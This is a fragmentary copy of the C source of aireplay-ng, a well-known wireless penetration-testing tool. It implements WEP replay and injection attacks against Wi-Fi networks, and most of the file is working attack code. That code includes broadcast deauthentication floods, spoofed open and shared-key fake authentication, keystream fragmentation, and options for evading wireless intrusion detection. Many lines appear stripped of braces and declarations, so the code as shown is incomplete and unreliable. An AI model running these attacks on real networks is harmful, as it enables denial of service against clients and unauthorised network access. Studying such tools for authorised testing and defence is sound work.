* 802.11 WEP replay & injection attacks
* Copyright (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
* Copyright (C) 2004, 2005 Christophe Devine
* WEP decryption attack (chopchop) developed by KoreK
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
* In addition, as a special exception, the copyright holders give
* permission to link the code of portions of this program with the
* OpenSSL library under certain conditions as described in each
* individual source file, and distribute linked combinations
* You must obey the GNU General Public License in all respects
* for all of the code used other than OpenSSL. If you modify
* file(s) with this exception, you may extend this exception to your
* version of the file(s), but you are not obligated to do so. If you
* do not wish to do so, delete this exception statement from your
* version. If you delete this exception statement from all source
* files in the program, then also delete it here.
#include <linux/rtc.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include "osdep/osdep.h"
#define RTC_RESOLUTION 8192
"\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
"\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"
"\xB0\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
"\xBB\xBB\xBB\xBB\xBB\xBB\xB0\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
"\xBB\xBB\xBB\xBB\xBB\xBB\xC0\x00\x31\x04\x64\x00"
"\x48\x01\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
"\xBB\xBB\xBB\xBB\xBB\xBB\xE0\x1B"
"\xB4\x00\x4E\x04\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC"
"\x01\x04\x02\x04\x0B\x16\x32\x08\x0C\x12\x18\x24\x30\x48\x60\x6C"
"\x40\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xCC\xCC\xCC\xCC\xCC\xCC" \
"\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00"
#define RATE_1M 1000000
#define RATE_2M 2000000
#define RATE_5_5M 5500000
#define RATE_11M 11000000
#define RATE_6M 6000000
#define RATE_9M 9000000
#define RATE_12M 12000000
#define RATE_18M 18000000
#define RATE_24M 24000000
#define RATE_36M 36000000
#define RATE_48M 48000000
#define RATE_54M 54000000
int bitrates[RATE_NUM]={RATE_1M, RATE_2M, RATE_5_5M, RATE_6M, RATE_9M, RATE_11M, RATE_12M, RATE_18M, RATE_24M, RATE_36M, RATE_48M, RATE_54M};
extern char * getVersion(char * progname, int maj, int min, int submin, int svnrev, int beta, int rc);
extern char * searchInside(const char * dir, const char * filename);
extern int maccmp(unsigned char *mac1, unsigned char *mac2);
extern unsigned char * getmac(char * macAddress, int strict, unsigned char * mac);
extern int check_crc_buf( unsigned char *buf, int len );
extern const unsigned long int crc_tbl[256];
extern const unsigned char crc_chop_tbl[256][4];
" %s - (C) 2006, 2007, 2008, 2009 Thomas d\'Otreppe\n"
" Original work: Christophe Devine\n"
" http://www.aircrack-ng.org\n"
" usage: aireplay-ng <options> <replay interface>\n"
" -b bssid : MAC address, Access Point\n"
" -d dmac : MAC address, Destination\n"
" -s smac : MAC address, Source\n"
" -m len : minimum packet length\n"
" -n len : maximum packet length\n"
" -u type : frame control, type field\n"
" -v subt : frame control, subtype field\n"
" -t tods : frame control, To DS bit\n"
" -f fromds : frame control, From DS bit\n"
" -w iswep : frame control, WEP bit\n"
" -D : disable AP detection\n"
" -x nbpps : number of packets per second\n"
" -p fctrl : set frame control word (hex)\n"
" -a bssid : set Access Point MAC address\n"
" -c dmac : set Destination MAC address\n"
" -h smac : set Source MAC address\n"
" -g value : change ring buffer size (default: 8)\n"
" -F : choose first matching packet\n"
" Fakeauth attack options:\n"
" -e essid : set target AP SSID\n"
" -o npckts : number of packets per burst (0=auto, default: 1)\n"
" -q sec : seconds between keep-alives\n"
" -y prga : keystream for shared key auth\n"
" -T n : exit after retry fake auth request n time\n"
" Arp Replay attack options:\n"
" -j : inject FromDS packets\n"
" Fragmentation attack options:\n"
" -k IP : set destination IP in fragments\n"
" -l IP : set source IP in fragments\n"
" Test attack options:\n"
" -B : activates the bitrate test\n"
" WIDS evasion options:\n"
" -y value : Use packets older than n packets\n"
" -i iface : capture packets from this interface\n"
" -r file : extract packets from this pcap file\n"
" Miscellaneous options:\n"
" -R : disable /dev/rtc usage\n"
" Attack modes (numbers can still be used):\n"
" --deauth count : deauthenticate 1 or all stations (-0)\n"
" --fakeauth delay : fake authentication with AP (-1)\n"
" --interactive : interactive frame selection (-2)\n"
" --arpreplay : standard ARP-request replay (-3)\n"
" --chopchop : decrypt/chopchop WEP packet (-4)\n"
" --fragment : generates valid keystream (-5)\n"
" --caffe-latte : query a client for new IVs (-6)\n"
" --cfrag : fragments against a client (-7)\n"
" --test : tests injection and quality (-9)\n"
" --help : Displays this usage screen\n"
unsigned char f_bssid[6];
unsigned char f_dmac[6];
unsigned char f_smac[6];
unsigned char r_bssid[6];
unsigned char r_dmac[6];
unsigned char r_smac[6];
unsigned char r_dip[4];
unsigned char r_sip[4];
char ip_out[16]; //16 for 15 chars + \x00
int fd_in, arptype_in;
int fd_out, arptype_out;
unsigned char mac_in[6];
unsigned char mac_out[6];
struct pcap_file_header pfh_in;
static struct wif *_wi_in, *_wi_out;
unsigned char essid[255];
unsigned char bssid[6];
unsigned int ping[REQUESTS];
struct APt ap[MAX_APS];
unsigned long nb_pkt_sent;
unsigned char h80211[4096];
unsigned char tmpbuf[4096];
unsigned char srcbuf[4096];
uchar ska_auth1[] = "\xb0\x00\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\xb0\x01\x01\x00\x01\x00\x00\x00";
uchar ska_auth3[4096] = "\xb0\x40\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\xc0\x01";
void sighandler( int signum )
if( signum == SIGINT )
if( signum == SIGALRM )
if(_wi_in != _wi_out)
/* open the replay interface */
_wi_out = wi_open(opt.iface_out);
dev.fd_out = wi_fd(_wi_out);
/* open the packet source */
if( opt.s_face != NULL )
_wi_in = wi_open(opt.s_face);
dev.fd_in = wi_fd(_wi_in);
wi_get_mac(_wi_in, dev.mac_in);
dev.fd_in = dev.fd_out;
dev.arptype_in = dev.arptype_out;
wi_get_mac(_wi_in, dev.mac_in);
wi_get_mac(_wi_out, dev.mac_out);
int set_bitrate(struct wif *wi, int rate)
if( wi_set_rate(wi, rate) )
// if( reset_ifaces() )
//Workaround for buggy drivers (rt73) that do not accept 5.5M, but 5M instead
if (rate == 5500000 && wi_get_rate(wi) != 5500000) {
if( wi_set_rate(wi, 5000000) )
newrate = wi_get_rate(wi);
for(i=0; i<RATE_NUM; i++)
if(bitrates[i] == rate)
if( newrate != rate )
if(bitrates[i-1] >= newrate)
printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n", (rate/1000000.0), (wi_get_rate(wi)/1000000.0));
if(bitrates[i+1] <= newrate)
printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n", (rate/1000000.0), (wi_get_rate(wi)/1000000.0));
printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n", (rate/1000000.0), (wi_get_rate(wi)/1000000.0));
int send_packet(void *buf, size_t count)
struct wif *wi = _wi_out; /* XXX globals suck */
unsigned char *pkt = (unsigned char*) buf;
if( (count > 24) && (pkt[1] & 0x04) == 0 && (pkt[22] & 0x0F) == 0)
pkt[22] = (nb_pkt_sent & 0x0000000F) << 4;
pkt[23] = (nb_pkt_sent & 0x00000FF0) >> 4;
if (wi_write(wi, buf, count, NULL) == -1) {
return 0; /* XXX not sure I like this... -sorbo */
perror("wi_write()");
int read_packet(void *buf, size_t count, struct rx_info *ri)
struct wif *wi = _wi_in; /* XXX */
rc = wi_read(wi, buf, count, ri);
void read_sleep( int usec )
struct timeval tv, tv2, tv3;
gettimeofday(&tv, NULL);
gettimeofday(&tv2, NULL);
while( ((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) < (usec) )
FD_SET( dev.fd_in, &rfds );
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv3 ) < 0 )
if( FD_ISSET( dev.fd_in, &rfds ) )
caplen = read_packet( h80211, sizeof( h80211 ), NULL );
gettimeofday(&tv2, NULL);
int filter_packet( unsigned char *h80211, int caplen )
int z, mi_b, mi_s, mi_d, ext=0, qos;
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
if ( ( h80211[0] & 0x80 ) == 0x80 )
qos = 1; /* 802.11e QoS */
if( (h80211[0] & 0x0C) == 0x08) //if data packet
ext = z-24; //how many bytes longer than default ieee80211 header
if( caplen-ext < opt.f_minlen ||
caplen-ext > opt.f_maxlen ) return( 1 );
/* check the frame control bytes */
if( ( h80211[0] & 0x0C ) != ( opt.f_type << 2 ) &&
opt.f_type >= 0 ) return( 1 );
if( ( h80211[0] & 0x70 ) != (( opt.f_subtype << 4 ) & 0x70) && //ignore the leading bit (QoS)
opt.f_subtype >= 0 ) return( 1 );
if( ( h80211[1] & 0x01 ) != ( opt.f_tods ) &&
opt.f_tods >= 0 ) return( 1 );
if( ( h80211[1] & 0x02 ) != ( opt.f_fromds << 1 ) &&
opt.f_fromds >= 0 ) return( 1 );
if( ( h80211[1] & 0x40 ) != ( opt.f_iswep << 6 ) &&
opt.f_iswep >= 0 ) return( 1 );
/* check the extended IV (TKIP) flag */
if( opt.f_type == 2 && opt.f_iswep == 1 &&
( h80211[z + 3] & 0x20 ) != 0 ) return( 1 );
/* MAC address checking */
switch( h80211[1] & 3 )
case 0: mi_b = 16; mi_s = 10; mi_d = 4; break;
case 1: mi_b = 4; mi_s = 10; mi_d = 16; break;
case 2: mi_b = 10; mi_s = 16; mi_d = 4; break;
default: mi_b = 10; mi_d = 16; mi_s = 24; break;
if( memcmp( opt.f_bssid, NULL_MAC, 6 ) != 0 )
if( memcmp( h80211 + mi_b, opt.f_bssid, 6 ) != 0 )
if( memcmp( opt.f_smac, NULL_MAC, 6 ) != 0 )
if( memcmp( h80211 + mi_s, opt.f_smac, 6 ) != 0 )
if( memcmp( opt.f_dmac, NULL_MAC, 6 ) != 0 )
if( memcmp( h80211 + mi_d, opt.f_dmac, 6 ) != 0 )
/* this one looks good */
int wait_for_beacon(uchar *bssid, uchar *capa, char *essid)
int len = 0, chan = 0, taglen = 0, tagtype = 0, pos = 0;
uchar pkt_sniff[4096];
struct timeval tv,tv2;
gettimeofday(&tv, NULL);
len = read_packet(pkt_sniff, sizeof(pkt_sniff), NULL);
gettimeofday(&tv2, NULL);
if(((tv2.tv_sec-tv.tv_sec)*1000000) + (tv2.tv_usec-tv.tv_usec) > 10000*1000) //wait 10sec for beacon frame
if(len <= 0) usleep(1);
if (! memcmp(pkt_sniff, "\x80", 1))
taglen = 22; //initial value to get the fixed tags parsing started
taglen+= 12; //skip fixed tags in frames
tagtype = pkt_sniff[pos];
taglen = pkt_sniff[pos+1];
} while(tagtype != 3 && pos < len-2);
if(tagtype != 3) continue;
if(taglen != 1) continue;
if(pos+2+taglen > len) continue;
chan = pkt_sniff[pos+2];
taglen = 22; //initial value to get the fixed tags parsing started
taglen+= 12; //skip fixed tags in frames
tagtype = pkt_sniff[pos];
taglen = pkt_sniff[pos+1];
} while(tagtype != 0 && pos < len-2);
if(tagtype != 0) continue;
if (memcmp(bssid, pkt_sniff+10, 6) == 0) break;
if(pos+2+taglen > len) continue;
if(taglen > 32)taglen = 32;
if((pkt_sniff+pos+2)[0] < 32 && memcmp(bssid, pkt_sniff+10, 6) == 0)
/* if bssid is given, copy essid */
if(bssid != NULL && memcmp(bssid, pkt_sniff+10, 6) == 0 && strlen(essid) == 0)
memset(essid, 0, 33);
memcpy(essid, pkt_sniff+pos+2, taglen);
/* if essid is given, copy bssid AND essid, so we can handle case insensitive arguments */
if(bssid != NULL && memcmp(bssid, NULL_MAC, 6) == 0 && strncasecmp(essid, (char*)pkt_sniff+pos+2, taglen) == 0 && strlen(essid) == (unsigned)taglen)
memset(essid, 0, 33);
memcpy(essid, pkt_sniff+pos+2, taglen);
memcpy(bssid, pkt_sniff+10, 6);
printf("Found BSSID \"%02X:%02X:%02X:%02X:%02X:%02X\" to given ESSID \"%s\".\n", bssid[0], bssid[1], bssid[2], bssid[3], bssid[4], bssid[5], essid);
/* if essid and bssid are given, check both */
if(bssid != NULL && memcmp(bssid, pkt_sniff+10, 6) == 0 && strlen(essid) > 0)
memset(essid2, 0, 33);
memcpy(essid2, pkt_sniff+pos+2, taglen);
if(strncasecmp(essid, essid2, taglen) == 0 && strlen(essid) == (unsigned)taglen)
printf("For the given BSSID \"%02X:%02X:%02X:%02X:%02X:%02X\", there is an ESSID mismatch!\n", bssid[0], bssid[1], bssid[2], bssid[3], bssid[4], bssid[5]);
printf("Found ESSID \"%s\" vs. specified ESSID \"%s\"\n", essid2, essid);
printf("Using the given one, double check it to be sure its correct!\n");
if(capa) memcpy(capa, pkt_sniff+34, 2);
if bssid != NULL it's looking for a beacon frame
int attack_check(uchar* bssid, char* essid, uchar* capa, struct wif *wi)
int ap_chan=0, iface_chan=0;
iface_chan = wi_get_channel(wi);
ap_chan = wait_for_beacon(bssid, capa, essid);
PCT; printf("No such BSSID available.\n");
if(ap_chan != iface_chan)
PCT; printf("%s is on channel %d, but the AP uses channel %d\n", wi_get_ifname(wi), iface_chan, ap_chan);
int getnet( uchar* capa, int filter, int force)
unsigned char *bssid;
if( memcmp(bssid, NULL_MAC, 6) )
PCT; printf("Waiting for beacon frame (BSSID: %02X:%02X:%02X:%02X:%02X:%02X) on channel %d\n",
bssid[0],bssid[1],bssid[2],bssid[3],bssid[4],bssid[5],wi_get_channel(_wi_in));
else if(strlen(opt.r_essid) > 0)
PCT; printf("Waiting for beacon frame (ESSID: %s) on channel %d\n", opt.r_essid,wi_get_channel(_wi_in));
printf("Please specify at least a BSSID (-b) or an ESSID (-e)\n");
printf("Please specify at least a BSSID (-a) or an ESSID (-e)\n");
if( attack_check(bssid, opt.r_essid, capa, _wi_in) != 0)
if(memcmp(bssid, NULL_MAC, 6))
if( strlen(opt.r_essid) == 0 || opt.r_essid[0] < 32)
printf( "Please specify an ESSID (-e).\n" );
if(!memcmp(bssid, NULL_MAC, 6))
if(strlen(opt.r_essid) > 0)
printf( "Please specify a BSSID (-a).\n" );
int xor_keystream(uchar *ph80211, uchar *keystream, int len)
for (i=0; i<len; i++) {
ph80211[i] = ph80211[i] ^ keystream[i];
int capture_ask_packet( int *caplen, int just_grab )
int i, j, n, mi_b=0, mi_s=0, mi_d=0, mi_t=0, mi_r=0, is_wds=0, key_index_offset;
struct pcap_file_header pfh_out;
struct pcap_pkthdr pkh;
if( opt.f_minlen < 0 ) opt.f_minlen = 40;
if( opt.f_maxlen < 0 ) opt.f_maxlen = 1500;
if( opt.f_type < 0 ) opt.f_type = 2;
if( opt.f_subtype < 0 ) opt.f_subtype = 0;
if( opt.f_iswep < 0 ) opt.f_iswep = 1;
signal( SIGINT, SIG_DFL );
if( time( NULL ) - tr > 0 )
printf( "\rRead %ld packets...\r", nb_pkt_read );
if( opt.s_file == NULL )
FD_SET( dev.fd_in, &rfds );
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )
if( errno == EINTR ) continue;
perror( "select failed" );
if( ! FD_ISSET( dev.fd_in, &rfds ) )
gettimeofday( &tv, NULL );
*caplen = read_packet( h80211, sizeof( h80211 ), NULL );
if( *caplen < 0 ) return( 1 );
if( *caplen == 0 ) continue;
/* there are no hidden backdoors in this source code */
if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 )
printf( "\r\33[KEnd of file.\n" );
if( dev.pfh_in.magic == TCPDUMP_CIGAM )
SWAP32( pkh.caplen );
tv.tv_sec = pkh.tv_sec;
tv.tv_usec = pkh.tv_usec;
n = *caplen = pkh.caplen;
if( n <= 0 || n > (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) )
printf( "\r\33[KInvalid packet length %d.\n", n );
if( fread( h80211, n, 1, dev.f_cap_in ) != 1 )
printf( "\r\33[KEnd of file.\n" );
if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER )
/* remove the prism header */
if( h80211[7] == 0x40 )
n = *(int *)( h80211 + 4 );
if( n < 8 || n >= (int) *caplen )
memcpy( tmpbuf, h80211, *caplen );
memcpy( h80211, tmpbuf + n, *caplen );
if( dev.pfh_in.linktype == LINKTYPE_RADIOTAP_HDR )
/* remove the radiotap header */
n = *(unsigned short *)( h80211 + 2 );
if( n <= 0 || n >= (int) *caplen )
memcpy( tmpbuf, h80211, *caplen );
memcpy( h80211, tmpbuf + n, *caplen );
if( dev.pfh_in.linktype == LINKTYPE_PPI_HDR )
/* remove the PPI header */
n = le16_to_cpu(*(unsigned short *)( h80211 + 2));
if( n <= 0 || n>= (int) *caplen )
/* for a while Kismet logged broken PPI headers */
if ( n == 24 && le16_to_cpu(*(unsigned short *)(h80211 + 8)) == 2 )
if( n <= 0 || n>= (int) *caplen )
memcpy( tmpbuf, h80211, *caplen );
memcpy( h80211, tmpbuf + n, *caplen );
if( filter_packet( h80211, *caplen ) != 0 )
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
switch( h80211[1] & 3 )
case 0: mi_b = 16; mi_s = 10; mi_d = 4; is_wds = 0; break;
case 1: mi_b = 4; mi_s = 10; mi_d = 16; is_wds = 0; break;
case 2: mi_b = 10; mi_s = 16; mi_d = 4; is_wds = 0; break;
case 3: mi_t = 10; mi_r = 4; mi_d = 16; mi_s = 24; is_wds = 1; break; // WDS packet
printf( "\n\n Size: %d, FromDS: %d, ToDS: %d",
*caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) );
if( ( h80211[0] & 0x0C ) == 8 && ( h80211[1] & 0x40 ) != 0 )
// if (is_wds) key_index_offset = 33; // WDS packets have an additional MAC, so the key index is at byte 33
// else key_index_offset = 27;
key_index_offset = z+3;
if( ( h80211[key_index_offset] & 0x20 ) == 0 )
printf( " Transmitter = %02X:%02X:%02X:%02X:%02X:%02X\n",
h80211[mi_t ], h80211[mi_t + 1],
h80211[mi_t + 2], h80211[mi_t + 3],
h80211[mi_t + 4], h80211[mi_t + 5] );
printf( " Receiver = %02X:%02X:%02X:%02X:%02X:%02X\n",
h80211[mi_r ], h80211[mi_r + 1],
h80211[mi_r + 2], h80211[mi_r + 3],
h80211[mi_r + 4], h80211[mi_r + 5] );
printf( " BSSID = %02X:%02X:%02X:%02X:%02X:%02X\n",
h80211[mi_b ], h80211[mi_b + 1],
h80211[mi_b + 2], h80211[mi_b + 3],
h80211[mi_b + 4], h80211[mi_b + 5] );
printf( " Dest. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
h80211[mi_d ], h80211[mi_d + 1],
h80211[mi_d + 2], h80211[mi_d + 3],
h80211[mi_d + 4], h80211[mi_d + 5] );
printf( " Source MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
h80211[mi_s ], h80211[mi_s + 1],
h80211[mi_s + 2], h80211[mi_s + 3],
h80211[mi_s + 4], h80211[mi_s + 5] );
/* print a hex dump of the packet */
for( i = 0; i < *caplen; i++ )
if( ( i & 15 ) == 0 )
printf( "\n --- CUT ---" );
printf( "\n 0x%04x: ", i );
printf( "%02x", h80211[i] );
if( ( i & 1 ) != 0 )
if( i == *caplen - 1 && ( ( i + 1 ) & 15 ) != 0 )
for( j = ( ( i + 1 ) & 15 ); j < 16; j++ )
if( ( j & 1 ) != 0 )
for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ )
printf( "%c", ( h80211[i - 15 + j] < 32 ||
h80211[i - 15 + j] > 126 )
? '.' : h80211[i - 15 + j] );
if( i > 0 && ( ( i + 1 ) & 15 ) == 0 )
for( j = 0; j < 16; j++ )
printf( "%c", ( h80211[i - 15 + j] < 32 ||
h80211[i - 15 + j] > 127 )
? '.' : h80211[i - 15 + j] );
printf( "\n\nUse this packet ? " );
while(!ret) ret = scanf( "%s", tmpbuf );
if( tmpbuf[0] == 'y' || tmpbuf[0] == 'Y' )
pfh_out.magic = TCPDUMP_MAGIC;
pfh_out.version_major = PCAP_VERSION_MAJOR;
pfh_out.version_minor = PCAP_VERSION_MINOR;
pfh_out.thiszone = 0;
pfh_out.sigfigs = 0;
pfh_out.snaplen = 65535;
pfh_out.linktype = LINKTYPE_IEEE802_11;
lt = localtime( (const time_t *) &tv.tv_sec );
memset( strbuf, 0, sizeof( strbuf ) );
snprintf( strbuf, sizeof( strbuf ) - 1,
"replay_src-%02d%02d-%02d%02d%02d.cap",
lt->tm_mon + 1, lt->tm_mday,
lt->tm_hour, lt->tm_min, lt->tm_sec );
printf( "Saving chosen packet in %s\n", strbuf );
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
perror( "fopen failed" );
n = sizeof( struct pcap_file_header );
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
perror( "fwrite failed\n" );
pkh.tv_sec = tv.tv_sec;
pkh.tv_usec = tv.tv_usec;
pkh.caplen = *caplen;
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 )
perror( "fwrite failed" );
if( fwrite( h80211, n, 1, f_cap_out ) != 1 )
perror( "fwrite failed" );
fclose( f_cap_out );
int read_prga(unsigned char **dest, char *file)
if(file == NULL) return( 1 );
if(*dest == NULL) *dest = (unsigned char*) malloc(1501);
f = fopen(file, "r");
printf("Error opening %s\n", file);
fseek(f, 0, SEEK_END);
if(size > 1500) size = 1500;
if( fread( (*dest), size, 1, f ) != 1 )
fprintf( stderr, "fread failed\n" );
void add_icv(uchar *input, int len, int offset)
unsigned long crc = 0xFFFFFFFF;
for( n = offset; n < len; n++ )
crc = crc_tbl[(crc ^ input[n]) & 0xFF] ^ (crc >> 8);
input[len] = (crc ) & 0xFF;
input[len+1] = (crc >> 8) & 0xFF;
input[len+2] = (crc >> 16) & 0xFF;
input[len+3] = (crc >> 24) & 0xFF;
void send_fragments(uchar *packet, int packet_len, uchar *iv, uchar *keystream, int fragsize, int ska)
uchar frag[32+fragsize];
data_size = packet_len-header_size;
packet[23] = (rand() % 0xFF);
for (t=0; t+=fragsize;)
memcpy(frag, packet, header_size);
//Copy IV + KeyIndex
memcpy(frag+header_size, iv, 4);
if(fragsize <= packet_len-(header_size+t-fragsize))
memcpy(frag+header_size+4, packet+header_size+t-fragsize, fragsize);
memcpy(frag+header_size+4, packet+header_size+t-fragsize, packet_len-(header_size+t-fragsize));
if (t< data_size) frag[1] |= 4;
if (t>=data_size) frag[1] &= 251;
for (u=t; u-=fragsize;)
//Calculate packet length
if(fragsize <= packet_len-(header_size+t-fragsize))
pack_size = header_size + 4 + fragsize;
pack_size = header_size + 4 + (packet_len-(header_size+t-fragsize));
add_icv(frag, pack_size, header_size + 4);
xor_keystream(frag + header_size + 4, keystream, fragsize+4);
send_packet(frag, pack_size);
if (t<data_size)usleep(100);
if (t>=data_size) break;
int do_attack_deauth( void )
int aacks, sacks, caplen;
if(getnet(NULL, 0, 1) != 0)
if( memcmp( opt.r_dmac, NULL_MAC, 6 ) == 0 )
printf( "NB: this attack is more effective when targeting\n"
"a connected wireless client (-c <client's mac>).\n" );
if( opt.a_count > 0 && ++n > opt.a_count )
if( memcmp( opt.r_dmac, NULL_MAC, 6 ) != 0 )
/* deauthenticate the target */
memcpy( h80211, DEAUTH_REQ, 26 );
memcpy( h80211 + 16, opt.r_bssid, 6 );
for( i = 0; i < 64; i++ )
PCT; printf( "Sending 64 directed DeAuth. STMAC:"
" [%02X:%02X:%02X:%02X:%02X:%02X] [%2d|%2d ACKs]\r",
opt.r_dmac[0], opt.r_dmac[1],
opt.r_dmac[2], opt.r_dmac[3],
opt.r_dmac[4], opt.r_dmac[5],
memcpy( h80211 + 4, opt.r_dmac, 6 );
memcpy( h80211 + 10, opt.r_bssid, 6 );
if( send_packet( h80211, 26 ) < 0 )
memcpy( h80211 + 4, opt.r_bssid, 6 );
memcpy( h80211 + 10, opt.r_dmac, 6 );
if( send_packet( h80211, 26 ) < 0 )
FD_SET( dev.fd_in, &rfds );
if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )
if( errno == EINTR ) continue;
perror( "select failed" );
if( ! FD_ISSET( dev.fd_in, &rfds ) )
caplen = read_packet( tmpbuf, sizeof( tmpbuf ), NULL );
if(caplen <= 0 ) break;
if(caplen != 10) continue;
if( tmpbuf[0] == 0xD4)
if( memcmp(tmpbuf+4, opt.r_dmac, 6) == 0 )
if( memcmp(tmpbuf+4, opt.r_bssid, 6) == 0 )
PCT; printf( "Sending 64 directed DeAuth. STMAC:"
" [%02X:%02X:%02X:%02X:%02X:%02X] [%2d|%2d ACKs]\r",
opt.r_dmac[0], opt.r_dmac[1],
opt.r_dmac[2], opt.r_dmac[3],
opt.r_dmac[4], opt.r_dmac[5],
/* deauthenticate all stations */
PCT; printf( "Sending DeAuth to broadcast -- BSSID:"
" [%02X:%02X:%02X:%02X:%02X:%02X]\n",
opt.r_bssid[0], opt.r_bssid[1],
opt.r_bssid[2], opt.r_bssid[3],
opt.r_bssid[4], opt.r_bssid[5] );
memcpy( h80211, DEAUTH_REQ, 26 );
memcpy( h80211 + 4, BROADCAST, 6 );
memcpy( h80211 + 10, opt.r_bssid, 6 );
memcpy( h80211 + 16, opt.r_bssid, 6 );
for( i = 0; i < 128; i++ )
if( send_packet( h80211, 26 ) < 0 )
int do_attack_fake_auth( void )
struct timeval tv, tv2, tv3;
int i, n, state, caplen, z;
int mi_b, mi_s, mi_d;
unsigned char ackbuf[14];
unsigned char ctsbuf[10];
unsigned char iv[4];
unsigned char challenge[2048];
unsigned char keystream[2048];
if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
printf( "Please specify a source MAC (-h).\n" );
if(getnet(capa, 0, 1) != 0)
if( strlen(opt.r_essid) == 0 || opt.r_essid[0] < 32)
printf( "Please specify an ESSID (-e).\n" );
memcpy( ackbuf, "\xD4\x00\x00\x00", 4 );
memcpy( ackbuf + 4, opt.r_bssid, 6 );
memset( ackbuf + 10, 0, 4 );
memcpy( ctsbuf, "\xC4\x00\x94\x02", 4 );
memcpy( ctsbuf + 4, opt.r_bssid, 6 );
x_send=opt.npackets;
if(opt.npackets == 0)
if(opt.prga != NULL)
if (opt.f_retry > 0) {
if (retry == opt.f_retry) {
if(ska && keystreamlen == 0)
opt.fast = 1; //don't ask for approval
memcpy(opt.f_bssid, opt.r_bssid, 6); //make the filter bssid the same, that is used for auth'ing
while(keystreamlen < 16)
capture_ask_packet(&caplen, 1); //wait for data packet
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
memcpy(iv, h80211+z, 4); //copy IV+IDX
i = known_clear(keystream, &keystreamlen, weight, h80211, caplen-z-4-4); //recover first bytes
for(i=0;i<keystreamlen;i++)
keystream[i] ^= h80211[i+z+4];
keystreamlen = opt.prgalen-4;
memcpy(iv, opt.prga, 4);
memcpy(keystream, opt.prga+4, keystreamlen);
/* attempt to authenticate */
memcpy( h80211, AUTH_REQ, 30 );
memcpy( h80211 + 4, opt.r_bssid, 6 );
memcpy( h80211 + 10, opt.r_smac , 6 );
memcpy( h80211 + 16, opt.r_bssid, 6 );
PCT; printf( "Sending Authentication Request" );
printf(" (Open System)");
printf(" (Shared Key)");
for( i = 0; i < x_send; i++ )
if( send_packet( h80211, 30 ) < 0 )
if( send_packet( ackbuf, 14 ) < 0 )
if( send_packet( ackbuf, 14 ) < 0 )
/* waiting for an authentication response */
if( time( NULL ) - tt >= 2 )
if(opt.npackets > 0)
"\nAttack was unsuccessful. Possible reasons:\n\n"
" * Perhaps MAC address filtering is enabled.\n"
" * Check that the BSSID (-a option) is correct.\n"
" * Try to change the number of packets (-o option).\n"
" * The driver/card doesn't support injection.\n"
" * This attack sometimes fails against some APs.\n"
" * The card is not on the same channel as the AP.\n"
" * You're too far from the AP. Get closer, or lower\n"
" the transmit rate.\n\n" );
/* attempt to authenticate using ska */
memcpy( h80211, AUTH_REQ, 30 );
memcpy( h80211 + 4, opt.r_bssid, 6 );
memcpy( h80211 + 10, opt.r_smac , 6 );
memcpy( h80211 + 16, opt.r_bssid, 6 );
h80211[1] |= 0x40; //set wep bit, as this frame is encrypted
memcpy(h80211+24, iv, 4);
memcpy(h80211+28, challenge, challengelen);
h80211[28] = 0x01; //its always ska in state==2
h80211[30] = 0x03; //auth sequence number 3
if(keystreamlen < challengelen+4 && notice == 0)
if(opt.prga != NULL)
PCT; printf( "Specified xor file (-y) is too short, you need at least %d keystreambytes.\n", challengelen+4);
PCT; printf( "You should specify a xor file (-y) with at least %d keystreambytes\n", challengelen+4);
PCT; printf( "Trying fragmented shared key fake auth.\n");
PCT; printf( "Sending encrypted challenge." );
gettimeofday(&tv2, NULL);
